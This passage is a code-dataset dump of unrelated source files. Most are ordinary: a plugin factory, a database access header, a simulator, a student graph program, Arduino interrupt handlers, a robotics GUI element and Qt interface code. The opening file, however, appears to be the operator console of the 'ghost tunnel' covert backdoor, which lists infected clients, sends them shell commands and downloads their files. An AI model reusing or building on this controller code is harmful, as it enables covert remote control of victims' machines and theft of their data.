*cs; if(client_session_query(src_mac, &cs)) { send(cs->id, TUNNEL_CON_SERVER_RES, data + sizeof(tunnel_data_header), tdh->length); } } } break; case TUNNEL_CON_HEARTBEAT: { client_session *cs; if(client_session_query(tdh->client_id, &cs)) { if(tdh->seq >= cs->seq + 1) { cs->is_connected = true; cs->seq = tdh->seq; } } } break; default: break; } } int gt_server::to_utf8(char *src, size_t *src_len, char *dest, size_t *dest_len) { iconv_t cd = iconv_open("UTF8", acp_name); if(cd==(iconv_t)-1) { printf("ERROR:open iconv %s\n",strerror(errno)); return -1; } size_t rc= iconv(cd, &src, src_len, &dest, dest_len); if(rc==(size_t)-1) { printf("ERROR: iconv %s\n",strerror(errno)); iconv_close(cd); return -1; } iconv_close(cd); return 0; } void gt_server::handle_shell(struct packet *pkt, unsigned char *data, int len) { tunnel_data_header *tdh = (tunnel_data_header*)data; char cmdstr[512]; char cmdstr_utf8[1024]; size_t len1; size_t len2; if(!cur_op_client || cur_op_client->id != tdh->client_id || server_id != tdh->server_id) return; if( tdh->seq < cur_op_client->seq + 1) return; cur_op_client->seq = tdh->seq; switch(tdh->data_type) { case TUNNEL_SHELL_DATA: memset(cmdstr, 0 , sizeof(cmdstr)); memset(cmdstr_utf8, 0, sizeof(cmdstr_utf8)); len1 = len - sizeof(tunnel_data_header); len2 = sizeof(cmdstr_utf8); memcpy(cmdstr, data + sizeof(tunnel_data_header), len1); to_utf8(cmdstr, &len1, cmdstr_utf8, &len2); printf("%s", cmdstr_utf8); edit_print_redraw(); break; case TUNNEL_SHELL_ACP: memcpy(&shell_acp, data + sizeof(tunnel_data_header), sizeof(shell_acp)); sprintf(acp_name, "CP%d", shell_acp); //printf("ACP: %d\n", shell_acp); break; default: break; } } int gt_server::download_progress(int rate) { static char bar[102]; int i=0; memset(bar,'\0',sizeof(bar)); const char* flag = "|/-\\"; for(i=0; i<rate;i++) bar[i] = '='; printf("[%-101s][%d][%c]\r",bar,rate,flag[rate%4]); fflush(stdout); if(rate==100) printf("\n"); } void gt_server::handle_file(struct packet *pkt, unsigned char *data, int len) { tunnel_data_header *tdh = (tunnel_data_header*)data; char file_path[256] = {0}; if(!cur_op_client || cur_op_client->id != tdh->client_id || server_id != tdh->server_id) return; if( tdh->seq < cur_op_client->seq + 1) return; cur_op_client->seq = tdh->seq; switch(tdh->data_type) { case TUNNEL_FILE_DATA: { fwrite(data + sizeof(tunnel_data_header), len - sizeof(tunnel_data_header), 1, fp); cur_size += (len - sizeof(tunnel_data_header)); //printf("download: %d%\n", cur_size * 100 / file_size); download_progress(cur_size * 100 / file_size); } break; case TUNNEL_FILE_INFO: { memcpy(&file_size, data + sizeof(tunnel_data_header), sizeof(file_size)); cur_size = 0; //printf("file size: %d\n", file_size); mkdir("downloads", S_IRUSR | S_IWUSR | S_IXUSR); if(fp){ fclose(fp); } snprintf(file_path, sizeof(file_path), "./downloads/%s", file_name); fp = fopen(file_path, "ab"); } break; case TUNNEL_FILE_END: { if(fp){ fclose(fp); } edit_print_ps(); } break; case TUNNEL_FILE_ERROR: { gt_log("ERROR: download file failed."); } break; default: break; } } void gt_server::client_session_insert(client_session *cs) { client_session_mgr.insert(client_manager_map::value_type(cs->id, *cs)); } void gt_server::client_session_delete(unsigned char client_id) { client_session_mgr.erase(client_id); } bool gt_server::client_session_query(unsigned char client_id, client_session **cs) { client_manager_map::iterator it; it = client_session_mgr.find(client_id); if(it != client_session_mgr.end()) { *cs = &it->second; return true; } return false; } bool gt_server::client_session_query(struct ether_addr *mac, client_session **cs) { client_manager_map::iterator it; for(it = client_session_mgr.begin(); it != client_session_mgr.end(); it++) { if(MAC_MATCHES(*mac, it->second.mac_addr)) { *cs = &it->second; return true; } } return false; } bool gt_server::client_session_exist(struct ether_addr *mac) { client_manager_map::iterator it; for(it = client_session_mgr.begin(); it != client_session_mgr.end(); it++) { if(MAC_MATCHES(*mac, it->second.mac_addr)) { return true; } } return false; } int gt_server::cmd_list(void *param, int argc, char *argv[]) { gt_server *gts = (gt_server*)param; client_manager_map::iterator it; char *os_name; printf("\n===========================================================================\n"); printf("id\t\tmac\t\t\t\tdevice name\t\tos\n"); for(it = gts->client_session_mgr.begin(); it != gts->client_session_mgr.end(); it++) { if (it->second.os_version == WIN_XP) os_name = "winxp"; else if (it->second.os_version == WIN_VISTA) os_name = "Vista"; else if (it->second.os_version == WIN_7) os_name = "Windows7"; else if (it->second.os_version == WIN_8) os_name = "Windows8"; else if (it->second.os_version == WIN_81) os_name = "Windows8.1"; else if (it->second.os_version == WIN_10) os_name = "Windows10"; else if (it->second.os_version == MAC_OSX) os_name = "OSX"; else os_name = "UnKnown"; printf("%d\t\t%02x:%02x:%02x:%02x:%02x:%02x\t\t%s\t\t%s\n", it->second.id, it->second.mac_addr.ether_addr_octet[0],it->second.mac_addr.ether_addr_octet[1],it->second.mac_addr.ether_addr_octet[2], it->second.mac_addr.ether_addr_octet[3],it->second.mac_addr.ether_addr_octet[4],it->second.mac_addr.ether_addr_octet[5], it->second.device_name, os_name); } edit_print_ps(); return 0; } int gt_server::cmd_use(void *param, int argc, char *argv[]) { gt_server *gts = (gt_server*)param; unsigned char client_id; char ps[256] = {0}; client_manager_map::iterator it; client_id = atoi(argv[0]); if(!gts->client_session_query(client_id, &gts->cur_op_client)) { gt_log("INFO: client [%d] not exist.", client_id); return -1; } sprintf(ps, "%s>", gts->cur_op_client->device_name); gts->send(gts->cur_op_client->id, TUNNEL_SHELL_INIT, NULL, 0); gts->gt_cnsl.set_prompt(ps); edit_print_ps(); printf("\n"); return 0; } int gt_server::cmd_exit(void *param, int argc, char *argv[]) { gt_server *gts = (gt_server*)param; if(gts->cur_op_client) { gts->send(gts->cur_op_client->id, TUNNEL_SHELL_QUIT, NULL, 0); gts->gt_cnsl.set_prompt(""); edit_print_ps(); gts->cur_op_client = NULL; } else { edit_print_ps(); } return 0; } int gt_server::cmd_wget(void *param, int argc, char *argv[]) { gt_server *gts = (gt_server*)param; char *p; if(gts->cur_op_client==NULL) { gt_log("Please select a client to operate."); return -1; } // TODO if(argc != 1){ gt_log("You can only download one file at a time."); return -1; } p = strrchr(argv[0], '\\'); if(p) { p++; snprintf(gts->file_name, sizeof(gts->file_name), "%d_%s", time(NULL), p); } else { snprintf(gts->file_name, sizeof(gts->file_name), "%d_%s", time(NULL), argv[0]); } gts->send(gts->cur_op_client->id, TUNNEL_FILE_GET, (unsigned char *)argv[0], strlen(argv[0])); printf("\n"); return 0; } int gt_server::cmd_quit(void *param, int argc, char *argv[]) { gt_server* gts = (gt_server*)param; printf("\n"); if(gts->cur_op_client) { gts->send(gts->cur_op_client->id, TUNNEL_SHELL_QUIT, NULL, 0); } while(!gts->send_queue.empty()) { usleep(1); } gts->~gt_server(); exit(0); return 0; } int gt_server::cmd_help(void *param, int argc, char *argv[]) { const struct gt_command *cmd = ghost_tunnel_commands; printf("\n\nCOMMANDS:\n\n"); while (cmd->cmd) { printf("\t%s %s\n", cmd->cmd, cmd->usage); cmd++; } edit_print_ps(); return 0; } void gt_server::print_help() { const struct gt_command *cmd = ghost_tunnel_commands; printf("\nCOMMANDS:\n"); while (cmd->cmd) { printf("\t%s %s\n", cmd->cmd, cmd->usage); cmd++; } } int gt_server::cmd_command(char *cmd) { if(cur_op_client) { printf("\n"); send(cur_op_client->id, TUNNEL_SHELL_DATA, (unsigned char*)cmd, strlen(cmd)); } return 0; } void gt_server::edit_cmd_command_cb(void *ctx, char *cmd_str) { gt_server *pgts = (gt_server*)ctx; const struct gt_command *cmd, *match = NULL; int count; char *argv[max_args]; int argc; char szcmd[512] = {0}; strncpy(szcmd, cmd_str, sizeof(szcmd)); argc = tokenize_cmd(cmd_str, argv); count = 0; cmd = ghost_tunnel_commands; while (cmd->cmd) { if (strncasecmp(cmd->cmd, argv[0], strlen(argv[0])) == 0) { match = cmd; if (os_strcasecmp(cmd->cmd, argv[0]) == 0) { /* we have an exact match */ count = 1; break; } count++; } cmd++; } if (count > 1) { printf("Ambiguous command '%s'; possible commands:", argv[0]); cmd = ghost_tunnel_commands; while (cmd->cmd) { if (strncasecmp(cmd->cmd, argv[0], strlen(argv[0])) == 0) { printf(" %s", cmd->cmd); } cmd++; } printf("\n"); } else if (count == 0) { if(pgts->cur_op_client) { pgts->cmd_command(szcmd); } else { printf("\nUnknown command '%s'\n", argv[0]); edit_print_ps(); } } else { match->handler(ctx, argc - 1, &argv[1]); } } void gt_server::edit_eof_cb(void *ctx) { eloop_terminate(); } char ** gt_server::edit_completion_cb(void *ctx, const char *str, int pos) { return 0; }
64af78f405c4724b005808abb5e6c158446d09b9
4e5b25aed669fb557cc093b1cf6164534e6fdfb9
/code/pkg_Core/Modules/PluginManager/Cx_ObjectFactory.cpp
1b6d5ffdadfda34150b2b20aae5ef365da561a38
[ "Apache-2.0" ]
permissive
412555124/x3c
c3fa91b2b64431649cd7350a309f9e07ba074494
40e64712fbf3593abca64fd42e5927bd895c8121
refs/heads/master
2023-05-04T01:22:07.089688
2021-05-28T15:14:44
2021-05-28T15:14:44
null
0
0
null
null
null
null
UTF-8
C++
false
false
5,187
cpp
Cx_ObjectFactory.cpp
// x3c - C++ PluginFramework #include <UtilFunc/PluginInc.h> #include "Cx_ObjectFactory.h" Cx_ObjectFactory::Cx_ObjectFactory() : m_unloading(0), m_loading(0) { ASSERT(x3InMainThread()); // see win32impl.h } Cx_ObjectFactory::~Cx_ObjectFactory() { for (std::vector<MODULE*>::iterator it = m_modules.begin(); it != m_modules.end(); ++it) { x3::SafeDelete(*it); } m_modules.clear(); } bool Cx_ObjectFactory::IsCreatorRegister(const X3CLSID& clsid) { return FindEntry(clsid) != NULL; } int Cx_ObjectFactory::CreateObject(const X3CLSID& clsid, X3IID iid, Ix_Object** ppv, HMODULE fromdll) { ASSERT(clsid.valid() && ppv != NULL); *ppv = NULL; int moduleIndex = -1; X3CLASSENTRY* pEntry = FindEntry(clsid, &moduleIndex); if (pEntry && !pEntry->pfnObjectCreator && moduleIndex >= 0) { if (!LoadDelayedPlugin_(m_modules[moduleIndex]->filename) && 0 == m_unloading && x3InMainThread()) { CLSMAP::iterator it = m_clsmap.find(clsid.str()); if (it != m_clsmap.end()) { it->second.second = -1; // next time: moduleIndex = -1 } } pEntry = FindEntry(clsid, &moduleIndex); } if (pEntry && pEntry->pfnObjectCreator) { *ppv = pEntry->pfnObjectCreator(iid, fromdll); } return *ppv ? 0 : 3; } X3CLASSENTRY* Cx_ObjectFactory::FindEntry(const X3CLSID& clsid, int* moduleIndex) { CLSMAP::iterator it = m_clsmap.find(clsid.str()); if (moduleIndex) { *moduleIndex = (it == m_clsmap.end()) ? -1 : it->second.second; } return (it == m_clsmap.end()) ? NULL : &(it->second.first); } int Cx_ObjectFactory::FindModule(HMODULE hModule) { if (!hModule) { return -1; } int i = x3::GetSize(m_modules); while (--i >= 0 && m_modules[i]->hdll != hModule) { } return i; } Ix_Module* Cx_ObjectFactory::GetModule(HMODULE hModule) { int index = FindModule(hModule); if (index >= 0) { return m_modules[index]->module; } typedef Ix_Module* (*FUNC_MODULE)(Ix_ObjectFactory*, HMODULE); FUNC_MODULE pfn = (FUNC_MODULE)GetProcAddress( hModule, "x3GetModuleInterface"); if (pfn != NULL) { Ix_Module* pModule = (*pfn)(this, hModule); return pModule; } else { return NULL; } } long Cx_ObjectFactory::RegisterClassEntryTable(int moduleIndex) { ASSERT(moduleIndex >= 0); HMODULE hdll = m_modules[moduleIndex]->hdll; Ix_Module* pModule = m_modules[moduleIndex]->module; ASSERT(hdll && pModule); if (!m_modules[moduleIndex]->clsids.empty()) { return x3::GetSize(m_modules[moduleIndex]->clsids); } typedef DWORD (*FUNC_GET)(DWORD*, DWORD*, X3CLASSENTRY*, DWORD); FUNC_GET pfn = (FUNC_GET)GetProcAddress(hdll, "x3GetClassEntryTable"); if (!pfn) // is not a plugin { return -1; } DWORD buildInfo = 0; int classCount = (*pfn)(&buildInfo, NULL, NULL, 0); if (classCount <= 0) { return 0; } std::vector<X3CLASSENTRY> table(classCount); DWORD size = sizeof(X3CLASSENTRY); classCount = (*pfn)(NULL, &size, &table[0], classCount); for (int i = 0; i < classCount; i++) { const X3CLASSENTRY& cls = table[i]; if (cls.clsid.valid()) { RegisterClass(moduleIndex, cls); } } return classCount; } bool Cx_ObjectFactory::RegisterClass(int moduleIndex, const X3CLASSENTRY& cls) { ASSERT(moduleIndex >= 0 && cls.clsid.valid()); X3CLASSENTRY* pOldCls = FindEntry(cls.clsid); if (pOldCls && pOldCls->pfnObjectCreator) { #ifdef OutputDebugString char msg[256] = { 0 }; sprintf_s(msg, 256, "The classid '%s' is already registered by '%s', " "then '%s' register fail.\n", cls.clsid.str(), pOldCls->className, cls.className); OutputDebugStringA(msg); #endif return false; } m_clsmap[cls.clsid.str()] = MAPITEM(cls, moduleIndex); m_modules[moduleIndex]->clsids.push_back(cls.clsid); return true; } void Cx_ObjectFactory::ReleaseModule(HMODULE hModule) { int index = FindModule(hModule); ASSERT(index >= 0); MODULE* item = m_modules[index]; CLSIDS::const_iterator it = item->clsids.begin(); for (; it != item->clsids.end(); ++it) { CLSMAP::iterator mit = m_clsmap.find(it->str()); if (mit != m_clsmap.end()) { m_clsmap.erase(mit); } } if (item->owned) { FreeLibrary(hModule); } // don't remove: m_modules.erase(m_modules.begin() + index); item->hdll = NULL; item->module = NULL; item->clsids.clear(); }
74d8205c514fbc4fba0e0a3b18403e171adc4ac6
9e1402dd5017c9a44118532fca4ebe47b0874906
/Fontes/ImportaRedeGIS/Egrid/EDPDAO.h
c5a36846425f705bb2c414f9db9e4f170ff06b6d
[]
no_license
danilodesouzapereira/projetoedp_importador
16fe331a5db775e44d16e3f7b1d4fc3f9f52b671
cf0dd4dfcd04699f3788be566f83e9ab7813253e
refs/heads/master
2023-03-25T21:08:16.919193
2021-03-11T18:55:33
2021-03-11T18:55:33
346,417,747
0
0
null
null
null
null
WINDOWS-1250
C++
false
false
3,871
h
EDPDAO.h
// --------------------------------------------------------------------------------------------- bof #ifndef EDPDAOH #define EDPDAOH // ---------------------------------------------------------------------------------------- includes #include <list> #include <Classes.hpp> // Project include //#include <SQLite\SQLite.h> #include <PlataformaSinap\Fontes\LocalDB\SQLite\VTSQLite.h> class EImportaEgridDAO; // --------------------------------------------------------------------------------------- namespace /*namespace sinapsis { namespace sinap { namespace edp { class EDPDAO; } } } */ using namespace std; //using sinapsis::sinap::edp::EDPDAO; // ------------------------------------------------------------------------------------------- class class EDPDAO : public TObject { private: VTSQLiteDB *sqLite; VTSQLiteTable* __fastcall ExecuteSql(UnicodeString sql) throw (EImportaEgridDAO); int __fastcall ExecuteDML(UnicodeString sql) throw (EImportaEgridDAO); public: __fastcall EDPDAO(UnicodeString filePathSED,UnicodeString filePathCOMMONS); __fastcall EDPDAO(UnicodeString filePath); __fastcall ~EDPDAO(void); void __fastcall Close(void); //GERAL VTSQLiteTable* __fastcall ExecuteSqlArranjo() throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlLocalidade() throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlRegional() throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSub() throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSub(int idSubestacao) throw (EImportaEgridDAO); // ETD VTSQLiteTable* __fastcall ExecuteSqlSubBarra(int idSubestacao) throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSubPri(void) throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSubPri(int idSubestacao) throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSubSocorro(AnsiString cmd_sql) throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSubTrafo(int idSubestacao) throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSubImpedancias(int idSubestacao) throw(EImportaEgridDAO); // PRIMÁRIO VTSQLiteTable* __fastcall ExecuteSqlPriBarra(int idAlimentador)throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlPriCapacitorParalelo(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlPriChave(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlPriRede(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlPriConsMT(int idAlimentador) throw (EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlPriGerador(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlPriLink(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlPriRegulador(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlPriSocorro(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlPriTrecho(int idAlimentador); // SECUNDÁRIO VTSQLiteTable* __fastcall ExecuteSqlSecBarra(int idSec) throw(EImportaEgridDAO); VTSQLiteTable* __fastcall ExecuteSqlSecConsBT(int idSec); VTSQLiteTable* __fastcall ExecuteSqlSecConsIP(int idSec); VTSQLiteTable* __fastcall ExecuteSqlSecGeradorBT(int idSecundario); VTSQLiteTable* __fastcall ExecuteSqlSecLinkBT(int idSecundario); VTSQLiteTable* __fastcall ExecuteSqlSecPCargaBT(int idSecundario); VTSQLiteTable* __fastcall ExecuteSqlSecRede(int idAlimentador); VTSQLiteTable* __fastcall ExecuteSqlSecTrafo(int idSec); VTSQLiteTable* __fastcall ExecuteSqlSecTrecho(int idSec); VTSQLiteTable* __fastcall ExecuteSqlSecUtcBT(int idSecundario); //VTSQLiteTable* __fastcall GetAlimentadorList(UnicodeString siglaSubestacao); VTSQLiteTable* __fastcall ExecuteSql_RedesMT(); VTSQLiteTable* __fastcall ExecuteSql_ChavesSocRedesMT(); VTSQLiteTable* __fastcall ExecuteSql_ChavesRedesMT(); }; #endif // --------------------------------------------------------------------------------------------- eof
90efee07668162b0e71c1884c2b093ced5839ed7
ba80cfb5e86022bfbd6ec50f74e87b9863e0ccdb
/SeaLifeSimulator/Simulator.h
8f30a8e5a82bfffd0e66400c928e00be55eda377
[]
no_license
DimitrisKlb/UniversityProjects
d56a56fe126415d9cb34c102dde6afdcc9d7e3e5
506c66026b1fa10eabe1f95e2ac8a35533e08f17
refs/heads/master
2021-05-02T16:07:41.208074
2018-02-08T12:26:48
2018-02-08T12:26:48
120,668,040
2
1
null
null
null
null
UTF-8
C++
false
false
941
h
Simulator.h
// Basiki klasi grafikwn pou periexei to Game-Loop kai Dimiourgia tou para8irou #ifndef SIMULATOR_H #define SIMULATOR_H #include <SDL.h> #include <SDL_image.h> #include <SDL_ttf.h> #include "SurfaceLib.h" #include "GraphicDefines.h" #include "States.h" #include "IntroState.h" #include "HelpState.h" #include "SimulationState.h" class Simulator{ public: Simulator(char* wName,int wHeight,int wWidth); int Execute(); bool Init(); void EventHandle(SDL_Event* Event); void Loop(); void Render(); void Cleanup(); void ChangeState(int nextState); void SetRunning(bool); char* GetWinName(); State** GetStates(); private: char* winName; // Titlos para8irou int winHeight,winWidth; // Diastaseis para8irou bool running; // Dikniousa tou an i efarmogi prepei na sinexisei na trexei SDL_Surface* screen; // Basiki epifaneia-panel tou para8irou State** theStates; int activeState; }; #endif
c60c65e913413bda6d5b7069562e118ffd3bf07c
f29b1135c9f4f95549846eccd10b1b6f67862188
/Assignment_5/Assignment_5/main.cpp
9fe03b13f7761eee29c639bd81ecfcc468fba410
[]
no_license
Vishal1541/Data-Structure-and-Algorithms
1b146ce6f91c3602eb5af2e4aa19847562889b81
5a32bd1f5de3e96fb0a367be0dd78ef8062760af
refs/heads/master
2020-03-21T15:31:11.359658
2018-06-26T09:43:19
2018-06-26T09:43:19
138,717,180
0
0
null
null
null
null
UTF-8
C++
false
false
981
cpp
main.cpp
//VISHAL ANAND //B16040 #include <iostream> #include "UndirectedGraph.hpp" using namespace std; int l,b,ans = 0; bool isValid(int i, int j){ return (i>=1 && i<=l && j>=1 && j<=b); } void work(int& i){ cout<<i<<" "; } int main(){ char mode,inp, vert = 0; cin>>l>>b>>mode; int bin[l+1][b+1]; for(int i=1; i<=l; i++){ for(int j=1; j<=b; j++){ cin>>inp; if(inp=='b') bin[i][j] = ++vert; else bin[i][j] = 0; } } int visited[vert+1]; for(int i=0; i<=vert; i++) visited[i] = 0; UndirectedGraph graph(vert,mode); for(int i=1; i<=l; i++){ for(int j=1; j<=b; j++){ if(bin[i][j]!=0){ if(isValid(i-1,j)) graph.add(bin[i][j],bin[i-1][j]); if(isValid(i,j+1)) graph.add(bin[i][j],bin[i][j+1]); if(isValid(i+1,j)) graph.add(bin[i][j],bin[i+1][j]); if(isValid(i,j-1)) graph.add(bin[i][j],bin[i][j-1]); } } } for(int i=1; i<=vert; i++) if(!visited[i]){ graph.dfs(work,i,visited); ans++; } cout<<"\nans = "<<ans<<endl; return 0; }
c88732e44f0b8c1ada160efa8363af0e77b9441c
b4cf52a31dbb9664cee4635777042f479539a4ef
/software/UNIBOT/BaseController/ArduinoMegaProBase/Arduini_extInts.ino
36631df7cfe105c9487dfd9eea99e6e02fa9917b
[]
no_license
CreativeRobotics/UNIBOT1
66c4967b2bec70e08fb382ee01fc10ef785a4795
7dc59c2909fc0885f5186a0c0134914f5d199a20
refs/heads/master
2020-03-26T23:54:41.163788
2018-08-21T14:51:27
2018-08-21T14:51:27
145,577,226
0
0
null
null
null
null
UTF-8
C++
false
false
1,968
ino
Arduini_extInts.ino
//some external int functions used for measuring hobby RC pulses #define int0pin 2 #define int1pin 3 #define int2pin 21 #define int3pin 20 #define RC_CENTRE 1564; volatile long pulse0; volatile long pulse1; volatile long pulse2; volatile long pulse3; void setupExtInts(){ pinMode(int0pin, INPUT); pinMode(int1pin, INPUT); pinMode(int2pin, INPUT); pinMode(int3pin, INPUT); attachInterrupt(0, ExtInt0, CHANGE); attachInterrupt(1, ExtInt1, CHANGE); attachInterrupt(2, ExtInt2, CHANGE); attachInterrupt(3, ExtInt3, CHANGE); } void ExtInt0(){ static long lasttime = 0; long currentTime = 0; //if pin goes high if(digitalRead(int0pin) == 1) lasttime = micros(); //if pin goes low else pulse0 = micros()-lasttime; //Serial.println("Pulse0"); } void ExtInt1(){ static long lasttime = 0; long currentTime = 0; //if pin goes high if(digitalRead(int1pin) == 1) lasttime = micros(); //if pin goes low else pulse1 = micros()-lasttime; //Serial.println("Pulse1"); } void ExtInt2(){ static long lasttime = 0; long currentTime = 0; //if pin goes high if(digitalRead(int2pin) == 1) lasttime = micros(); //if pin goes low else pulse2 = micros()-lasttime; //Serial.println("Pulse2"); } void ExtInt3(){ static long lasttime = 0; long currentTime = 0; //if pin goes high if(digitalRead(int3pin) == 1) lasttime = micros(); //if pin goes low else pulse3 = micros()-lasttime; //Serial.println("Pulse2"); } long getPulse(int pulseNo){ if(pulseNo == 0) return pulse0; else return pulse1; } int getScaledPulse(int pulseNo){ switch(pulseNo){ case 0: return (int)pulse0-RC_CENTRE; break; case 1: return (int)pulse1-RC_CENTRE; break; case 2: return (int)pulse2-RC_CENTRE; break; case 3: return (int)pulse3-RC_CENTRE; break; default: return 0; } } void resetPulses(){ pulse0 = 0; pulse1 = 0; pulse2 = 0; }
9d2fd7120237bf76ac77029e5715a0e0572ee890
459d0ccd07497a5e7e4b5900723b3dd3221d510d
/include/Behaviors/SimpleRotationBehavior.h
b53cdcd7f32895e1f93f4fa00fbae6c846f12384
[]
no_license
chipot/Yagw
a38d3c8d486907f84272dcda9f53b27643d8f9c7
c8c058d74f26e777dae958c5a698b8d590b646e4
refs/heads/master
2016-09-05T12:37:24.750293
2011-12-01T23:10:23
2011-12-01T23:10:23
null
0
0
null
null
null
null
UTF-8
C++
false
false
448
h
SimpleRotationBehavior.h
#ifndef LFOLLOWINGROTATIONBEHAVIOR_H #define LFOLLOWINGROTATIONBEHAVIOR_H #include <QtCore/qmath.h> #include "Behaviors.h" class SimpleRotationBehavior : public RotationBehavior { protected : int angle; public : SimpleRotationBehavior(Entity *ent = 0, Entity *t = 0, int a = 0) : RotationBehavior(ent, t), angle(a) {} void rotate(); void init(); SimpleRotationBehavior *copy() const; }; #endif // FOLLOWINGROTATIONBEHAVIOR_H
5b645ff4b3f391a3674222893af6768d3d52260a
cfd74a0d1f76dcba890d13b639c5e767249ae05e
/include/mc_rtc/gui/Visual.h
cb265c55694d18a2ecc613eae750d9725c3f1444
[ "Qhull", "MIT", "BSD-3-Clause", "BSD-2-Clause" ]
permissive
jrl-umi3218/mc_rtc
4b2f640f439cf766a6d8c224fb803fecc2932c5a
59d714f2598393c5f94ae5395c26c834d2688a76
refs/heads/master
2023-08-31T16:02:25.586881
2023-08-30T11:40:46
2023-08-30T11:40:46
227,037,645
77
30
BSD-2-Clause
2023-09-14T12:04:18
2019-12-10T05:39:23
C++
UTF-8
C++
false
false
1,933
h
Visual.h
/* * Copyright 2015-2021 CNRS-UM LIRMM, CNRS-AIST JRL */ #pragma once #include <mc_rtc/gui/details/traits.h> #include <mc_rtc/gui/elements.h> #include <mc_rtc/gui/types.h> #include <mc_rbdyn/configuration_io.h> #include "mc_rtc/MessagePackBuilder.h" namespace mc_rtc::gui { namespace details { /** Visual display shows the provided rbd::parsers::Visual element at the provided location * * \tparam GetVisual Must return an rbd::parsers::Visual * * \tparam GetPos Must return an sva::PTransformd or an Eigen::Vector3d * */ template<typename GetVisual, typename GetPos> struct VisualImpl : public Element { static constexpr auto type = Elements::Visual; VisualImpl(const std::string & name, GetVisual get_visual_fn, GetPos get_pos_fn) : Element(name), get_visual_fn_(get_visual_fn), get_pos_fn_(get_pos_fn) { static_assert(details::CheckReturnType<GetVisual, rbd::parsers::Visual>::value, "Visual element visual callback must return an rbd::parsers::Visual"); static_assert(details::CheckReturnType<GetPos, sva::PTransformd, Eigen::Vector3d>::value, "Visual element position callback must return an sva::PTransformd or an Eigen::Vector3d"); } /** Invalid element */ VisualImpl() {} constexpr static size_t write_size() { return Element::write_size() + 2; } void write(mc_rtc::MessagePackBuilder & builder) { Element::write(builder); visual_.add("data", get_visual_fn_()); builder.write(visual_("data")); builder.write(get_pos_fn_()); } private: GetVisual get_visual_fn_; GetPos get_pos_fn_; mc_rtc::Configuration visual_; }; } // namespace details /** Helper function to create a details::VisualImpl */ template<typename GetVisual, typename GetPos> auto Visual(const std::string & name, GetVisual get_visual_fn, GetPos get_pos_fn) { return details::VisualImpl(name, get_visual_fn, get_pos_fn); } } // namespace mc_rtc::gui
354d430d380ecc42bea3314d1ccce80d9b7003bb
3e0953df3e3537ddb9a4f4fac17fe595ade4ffbb
/maincontrols.cpp
0f357df9472ba2c6bfd843ff6f8aa4d00c9585ec
[]
no_license
brians444/RaspiBrew
cdd442713f5a52c303140dc5a4b72bde457ffd53
d00e196aedc90f71603c38f161f67c67c0c51033
refs/heads/master
2020-12-03T00:03:49.578538
2017-08-16T01:49:46
2017-08-16T01:49:46
95,981,714
1
0
null
null
null
null
UTF-8
C++
false
false
16,578
cpp
maincontrols.cpp
#include "mainwindow.hpp" #include "ui_mainwindow.h" /******************************************************************************************************************/ /******************************************************************************************************************/ /* Slot for port opened successfully */ /******************************************************************************************************************/ /*void MainWindow::portOpenedSuccess() { //qDebug() << "Port opened signal received!"; ui->statusBar->showMessage("Conectado!"); // Disable controls if port is open ui->saveJPGButton->setEnabled(true); // Enable button for saving plot crearGrafico1(); // Create the QCustomPlot area // Create the QCustomPlot area updateTimer.setInterval(500); // Slot is refreshed 20 times per second /********* Modificacion * ui->stopPlotButton->setText("Stop Plot"); // Enable button for stopping plot * ui->stopPlotButton->setEnabled(true); * updateTimer.stop(); // Stop updating plot timer * * Con la modificacion no inicia solo el grafico * plotting = false; ui->stopPlotButton->setEnabled(true); ui->stopPlotButton->setText("Iniciar! "); connected = true; // Set flags //plotting = true; } /******************************************************************************************************************/ /******************************************************************************************************************/ /* Number of axes combo; when changed, display axes colors in status bar */ /******************************************************************************************************************/ void MainWindow::on_comboAxes_currentIndexChanged(int index) { if(index == 0) { ui->statusBar->showMessage("Axis 1: Red"); } else if(index == 1) { ui->statusBar->showMessage("Axis 1: Red; Axis 2: Yellow"); } else { ui->statusBar->showMessage("Axis 1: Red; Axis 2: Yellow; Axis 3: Green"); } } /******************************************************************************************************************/ /******************************************************************************************************************/ /* Imprime las coordenadas del puntero del mouse en el barra de estado */ /******************************************************************************************************************/ void MainWindow::onMouseMoveInPlot(QMouseEvent *event) { int xx = ui->plot->xAxis->pixelToCoord(event->x()); double yy = ui->plot->yAxis->pixelToCoord(event->y()); QDateTime tt; tt.fromTime_t(xx); QString coordinates("X: %1 Y: %2"); coordinates = coordinates.arg(tt.fromTime_t(xx).toString()).arg(yy); ui->statusBar->showMessage(coordinates); } /******************************************************************************************************************/ /******************************************************************************************************************/ /* Shows a window with instructions */ /******************************************************************************************************************/ void MainWindow::on_actionHow_to_use_triggered() { helpWindow = new HelpWindow(this); helpWindow->setWindowTitle("Como usar esta aplicacion!"); helpWindow->show(); } /******************************************************************************************************************/ /******************************************************************************************************************/ /**Create the GUI */ /******************************************************************************************************************/ void MainWindow::createUI() { max_slider = 100; min_slider = 0; high = 40.00; lower = -10.00; res = (high-lower)/max_slider; // Que me permita variar de 40ºC hasta -10ºC termometros[0] = ui->Thermo; termometros[1] = ui->Thermo_2; termometros[2] = ui->Thermo_3; termometros[3] = ui->Thermo_4; termometros[4] = ui->Thermo_5; termometros[5] = ui->Thermo_6; termometros[6] = ui->Thermo_7; termometros[7] = ui->Thermo_8; temps_actuales[0] = ui->label_t1; temps_actuales[1] = ui->label_t2; temps_actuales[2] = ui->label_t3; temps_actuales[3] = ui->label_t4; temps_actuales[4] = ui->label_t5; temps_actuales[5] = ui->label_t6; temps_actuales[6] = ui->label_t7; temps_actuales[7] = ui->label_t8; for(int i = 0; 